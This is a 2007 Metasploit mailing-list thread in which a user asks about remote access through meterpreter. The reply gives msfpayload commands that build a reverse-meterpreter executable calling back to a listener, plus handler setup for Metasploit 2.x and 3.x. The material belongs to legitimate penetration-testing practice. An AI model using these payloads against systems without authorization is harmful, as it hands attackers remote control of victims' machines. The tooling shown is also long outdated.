Metasploit mailing list archives

query about meterpreter


From: elite_netbios at yahoo.com (Hamid . K)
Date: Fri, 4 May 2007 10:28:53 -0700 (PDT)

Hi ,
This question is answered multiple times before this .
feel free to browse mailing-list archive.
here's my quick way :

in 2.x :
=====
msfpayload win32_reverse_meterpreter LHOST=83.170.59.15 LPORT=443 EXITFUNC=thread X >rev2.exe
msfcli payload_handler PAYLOAD=win32_reverse_meterpreter LHOST=1.2.3.4 LPORT=21 E

in 3.x
====
msfpayload windows/meterpreter/reverse_tcp LPORT=21 LHOST=1.2.3.4 EXITFUNC=thread X >x.exe

As we no more have msfcli in 3.x , you should use HANDLER  module , with proper payload set : 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 


hamid.




----- Original Message ----
From: Ramakrishna Nyayapathi <nramkey at gmail.com>
To: framework at metasploit.com
Sent: Friday, May 4, 2007 4:05:01 PM
Subject: [framework] query about meterpreter

Hi all,
Many congrats to the metasploit team for writing such a wonderful tool.
I was wondering if it would be possible to obtain access to a remote host through meterpreter-say a windows box running 
netcat or telnet server without using any exploit?






 
____________________________________________________________________________________
It's here! Your new message!  
Get new email alerts with the free Yahoo! Toolbar.
http://tools.search.yahoo.com/toolbar/features/mail/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070504/e89b5057/attachment.htm>


Current thread: